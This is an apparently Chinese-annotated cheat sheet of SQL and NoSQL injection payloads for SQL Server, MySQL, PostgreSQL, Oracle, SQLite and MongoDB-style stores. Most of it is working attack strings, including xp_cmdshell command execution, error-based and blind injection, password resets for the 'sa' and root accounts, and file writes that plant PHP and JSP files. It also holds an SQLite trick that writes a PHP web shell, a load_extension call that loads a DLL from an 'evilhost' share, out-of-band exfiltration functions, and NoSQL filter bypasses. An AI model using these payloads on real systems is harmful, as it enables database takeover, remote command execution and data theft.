
SQL Server Payload

1.1. 常见Payload

Version

SELECT @@version

Comment

SELECT 1 -- comment
SELECT /*comment*/1

Space

0x01 - 0x20

用户信息

SELECT user_name()
SELECT system_user
SELECT user
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

用户权限

select IS_SRVROLEMEMBER('sysadmin')
select IS_SRVROLEMEMBER('db_owner')

List User

SELECT name FROM master..syslogins

数据库信息

SELECT name FROM master..sysdatabases
select concat_ws(table_schema,table_name,column_name) from information_schema.columns
select quotename(name) from master..sysdatabases FOR XML PATH('')

执行命令

EXEC xp_cmdshell 'net user'

Ascii

SELECT char(0x41)
SELECT ascii('A')
SELECT char(65)+char(66) -- returns 'AB'

Delay

WAITFOR DELAY '0:0:3' -- pauses for 3 seconds

Change Password

ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'

Trick

id=1 union:select password from:user

文件读取

OpenRowset

当前查询语句

select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)

hostname

用于判断是否站库分离

select host_name()
exec xp_getnetname

服务器信息

exec xp_msver

1.2. 注册表读写

xp_regread
    exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'
xp_regwrite
xp_regdeletevalue
xp_regdeletekey
xp_regaddmultistring

1.3. 报错注入

1=convert(int,(db_name()))

1.4. 常用函数

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

1.5. DNS OOB

fn_xe_file_target_read_file
fn_get_audit_file
fn_trace_gettable

1.6. 其他常用存储过程

sp_execute_external_script
sp_makewebtask
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
xp_cmdshell
xp_dirtree
xp_enumerrorlogs
xp_enumgroups
xp_fixeddrives
xp_getfiledetails
xp_loginconfig

MySQL Payload

1.1. 常见Payload

Version

SELECT @@version

Comment

SELECT 1 -- comment
SELECT 1 # comment
SELECT /*comment*/1

Space

0x9 0xa-0xd 0x20 0xa0

Current User

SELECT user()
SELECT system_user()

List User

SELECT user FROM mysql.user

Current Database

SELECT database()

List Database

SELECT schema_name FROM information_schema.schemata

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

If

SELECT if(1=1,'foo','bar'); -- returns 'foo'

Ascii

SELECT char(0x41)
SELECT ascii('A')
SELECT 0x414243 -- returns 'ABC'

Delay

sleep(1)
SELECT BENCHMARK(1000000,MD5('A'))

Read File

select @@datadir
select load_file('databasename/tablename.MYD')

Blind

ascii(substring(str,pos,length)) & 32 = 1

Error Based

select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))

Change Password

mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"

报错注入常见函数

extractvalue
updatexml
GeometryCollection
linestring
multilinestring
multipoint
multipolygon
polygon
exp

1.2. 写文件

写文件前提

  • root 权限
  • 知晓文件绝对路径
  • 写入的路径存在写入权限
  • secure_file_priv 允许向对应位置写入；FILE 权限可用 select count(file_priv) from mysql.user 检查

基于 into 写文件

union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'

dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏

基于 log 写文件

show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '<?php var_dump("test");?>';
set global general_log_file = '/original/path';
set global general_log = off;

PostgreSQL Payload

Version

SELECT version()

Comment

SELECT 1 -- comment
SELECT /*comment*/1

Current User

SELECT user
SELECT current_user
SELECT session_user
SELECT getpgusername()

List User

SELECT usename FROM pg_user

Current Database

SELECT current_database()

List Database

SELECT datname FROM pg_database

Ascii

SELECT char(0x41)
SELECT ascii('A')

Delay

pg_sleep(1)

Oracle Payload

常见Payload

dump

select * from v$tablespace;
select * from user_tables;
select column_name from user_tab_columns where table_name = 'table_name';
select column_name, data_type from user_tab_columns where table_name = 'table_name';
SELECT * FROM ALL_TABLES

Comment

--
/**/

Space

0x00 0x09 0xa-0xd 0x20

报错

utl_inaddr.get_host_name
ctxsys.drithsx.sn
ctxsys.CTX_REPORT.TOKEN_TYPE
XMLType
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
ordsys.ord_dicom.getmappingxpath
utl_inaddr.get_host_name
utl_inaddr.get_host_address

OOB

utl_http.request
utl_inaddr.get_host_address
SYS.DBMS_LDAP.INIT
HTTPURITYPE
HTTP_URITYPE.GETCLOB

绕过

rawtohex

写文件

create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
isto_file utl_file.file_type;
begin
isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
utl_file.put_line(isto_file, '<% out.println("test"); %>');
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;

SQLite3 Payload

Comment

--
/**/

Version

select sqlite_version();

Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--

Load_extension

UNION SELECT 1,load_extension('\\evilhost\evil.dll','E');--

NoSQL Payload

常见Payload

绕过限制条件

{"username": "user"} => {"username": {"ne": "fakeuser"}}
{"$where": "return true"}

测试用字符

'"\/$[].>

布尔测试常用

{"$ne": -1}
{"$in": []}
{"$where": "return true"}
{"$or": [{},{"foo":"1"}]}

时间

{"$where": "sleep(100)"}
